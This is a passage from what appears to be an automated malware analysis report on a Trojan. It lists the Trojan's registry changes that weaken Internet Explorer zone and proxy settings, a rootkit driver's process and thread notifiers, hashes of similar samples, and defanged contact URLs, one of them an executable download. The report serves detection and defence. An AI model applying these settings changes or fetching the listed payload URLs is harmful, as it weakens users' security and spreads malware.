[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:1376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 77 BA 85 D2 3E 85 40 BE E6 D7 D2 E3 98 52 2F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_smk.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 C6 29 9B 92 D6 BD 7A 30 61 A2 12 65 D9 94 56"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.8.9507.674
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.9507.674
File Description:
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 67
6062e09cf5242c3c359d3c108ad59389
e38f08a46654ef62510696ac3bc4fcad
53ed21a1a3842499de70c839f6688ee3
c5bdf13cb3c8dbde1ec4b286ca20bae6
7cf20b75408b6a8161989aaee64f42f5
36cf4b45e9367be6b90814da2f81e48d
0d4ac1a665beed760f7690e87119720c
d0d693a9ea0e484536c7f74d169daf4e
43f5b1f76da29768141872e2a34d2b48
69cb2acfe85484a0070a46b22f8e2a71
ef528f277371c6051d2346de341e19cf
c6676427b881ce796e502d7078cb0084
892f9ad025b9ba2f4316597ad9409899
1600a7e12ff76bd213dc05ab99f274d6
907d9e551a1efdc30f13b255cb633599
d2a045d9f91d46a9f6631e04b8586f17
a0bfaa8fd89a89aacd06c3ea2a5a4d76
df85b5c89d3bd544c24ad4d7028b9770
79526a28e4355b330f4355dee6f79db0
a7a58d7d3bcbe4eb9d021237e4b0d507
ed2699844d1dec0dff8dc24c0d498fa0
f0d149ed27e58de424f81e232fbecddf
2f838876819239b892b1debd060db6f3
fdf0b180a1603dce799f95d98bfe3e27
216d5147d5fc386faf12db1d474aed4a

URLs

URL	IP
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=hWfaA75NtHGgFyq1UqA1LTGi57tKDBZAmkbcHfsclGUeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UGixtOScfpnmrXIxNf6X/p8jq1U t1gQfOJGi8wh2qItjgb6v7cXpPvVs 1hpnKPWNckWery5nY61wQMeOGfVSoklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=gwZ4/u7hMkLK7BVW0pZkfhb2ezGP2tbZIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh/bLm/j9YcRV23zceadiRZC/AFbVLp3Hi0MyGFWhm97EgudgSzDBDiV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/t.ashx?e=KSz5qzb2KgKyCpK5vbxu3GMS6xMm5DPOHW55GOTjPfmmy6t0 u4xzf2TEkHeJNDUDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KRWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLRBRa93/wJ4K5g1UaeibIFKYX3Ti/i3YNSfnOwL00n5Z1 bwt5t6kul7 MWoTgv1cPg3JQuiDood/dJkCtxgij8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMIujBCDs6Ht7GyVF/kSMGlkwAqrxEu3DF7I/BhPOwx7A==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=/9ZmISdorEsrtsyJz2huuzGi57tKDBZAEhGH33nPGlEeaFNcfNJ0DqkO9/DuORuprIIa1xct7IlIfNarWZRfueseCNypxTRvYCpHZc9ZUaH6MIOzDij/FhQC drCF7eFJbqKp/8aFwxJ6jPseS6H6rKvpxbP8RnAEuJwrUmAgU48TCxIgxbNUN9iFWinPncqRTkwMJcPGBf6QurlzirW79Yv9URdvFIQiBUa95CjAgcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhdMjNPpg04wp5PJSvtznUqJGbmFw3eeWJ0LF5FjnIRYED/OBEyqhe3A4cQRUyfrCw1zIhutCMBGewHfwT3XPm7ZSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd2Pbk/9NONlMwdHiAKz3nHY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4=	198.232.124.192
hxxp://d13s98z2lzti92.cloudfront.net/smw9476dp.exe	216.137.61.114
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=AZwPyJy3TZh4HRn2UIUeHjMhuAiDCZy0nvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94u3oGHN86wPfE/ OuNytPyvTet81FAwHjgb6v7cXpPsCR1eJJaqZuTEmVd5boNaQ9RM9cvdqwuUEQrG4Q2s2p4ghywxFINBPLhsL7x0yEItFgAYD7IlOORzySwR 0UMpQDKCf8yUYWIYaNv1rXN/ko2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=iDRrwQhh7wubZPRBHClMwBAZQSgySSeP/ToTRiVFxVRrBKqdyQvXy8FqjxctBQAySlCyq068/M1FOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCB3wF8xC533FcDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KR1QHs3X92ilGOTz1mAXFvBrPiCC4paVhd51vWMEpOYI9vFWuyZiLPwZdd8oa6X2ADHiBn688lkcr8toCm18jzw11KFwF9lIs91urDxSq54gssWphB8HvgGC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd65Cl b7PgcYaQxEgOaYYTbGJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaF K90vWg22jgTxIUcsgQ w9JTsKksJzkc9GdOcgDY83FHRy24uRaNd5D1mYH yQN4uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaETVDNBVYCm8jEzQGoF c24WnZlMkE cTWzrf1vX5AkfSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZaOxYJ8dWCEzVhG/x7b SWW5N9iJI sAWfK5w9Mw84Eg==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaFteqZ6txLbCymF904v4t2Dnog6XUlbewcH2RZLt1dnp6UixEX0xfzw4HtieZnm 5lfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERKtK2nLIJE3nHvKbjUyzCCcFAL52sIXt4WJJdSgnf3DEaNti66QtAKhfA9DmA/gYOYuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJOW4G7RSbXnJzBAJhcf/vDKYX3Ti/i3YOdKlZ7h7cKpMVf 88v DEXLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlNvmf3gdPUqQs IILilpWF3zNK4whhQy Y93IDHD2utNjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTN0F 4TVHAcQ==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=N6dOqWm8Q94fEbCpbJoCfl DeWF87/a tcdaVQJz0Lv UINFgbXOio5xPF2gxegOjOluN4MfK82okOeVQ5E0okWABgPsiU45HPJLBH7RQylAMoJ/zJRhYuWxknbJ8xO1QS3i7uWq3ey09V1QzwojTzzcpdlMXfDB0LGw gTQHOXEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=hXeqmv1IpenVj9BNm3y5BzGi57tKDBZAmkbcHfsclGUeaFNcfNJ0DqkO9/DuORuprIIa1xct7Ik 99Kb8MNzlldQOXofA8VY1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF38kle5tupXGHHMGUmhiJT7gXXflM9GuSQ8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/t.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=1ZEnpGuz/IS8qFEAMB5m c6n6T6feu1MnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz9333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=j7YMo/n29XPJd3Cl8WpRrisj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlL1HtSmBYQHI0JQd5HxgIXeHOq2aoArvNY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va AW1ilHO0XlqaFGmNQisoEs IILilpWF2V9PoQYImhoi5ITADj fT8LkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va9X2V/SFN607WhPkLraqHTm0JQd5HxgIXcQOMljDWW9j2p99Xf0/DnudxygAlsjjAoDzAMf3myei3FoFumQGvNnWzsL6WMT/SwfVCvNBlCsGNZ8IeDOKR jnWMff4Q oj2Xr wogK3l0K88tZGn3ZbeZZ7z51F tJFmkm2U99zhC5SM3ph4m/ub2WPxooJBSEfKuXNkb9Ipz0vOSy6/9UD7v2dOTSCKQAEGFWYVf aIRoqDwneG9OT2WXrj6ZUfAb5hKtWJq6BTOwtTpX/QxZUjjb4jQoSuQY5U1UA3XDfdz2vKjb/PWSCkM43K3xVh7gIklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=vjRn qH YuNfg3lhfO/2vrXHWlUCc9C7/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI0883KXZTF3wwdCxsPoE0BzlnbJKYwPfuhDE5OzB3lHNZDDg9SakjfptxJ3Q48ku2 MNZxDwj5vyAYr4bF0jrN61xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va8FwTBnjqtB6SJSQWKLfKoAjgb6v7cXpPtruJ2zeNP9BRjldEvIPSqUX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCBw==	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=hpY1rXLYst7XN7SCySESdzGi57tKDBZABBvtTcvyOOgeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcntO0hfxvipXjJX2BNWr5ZmwkqgaQEwGAs IILilpWF3Xrw5h2f8ieI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
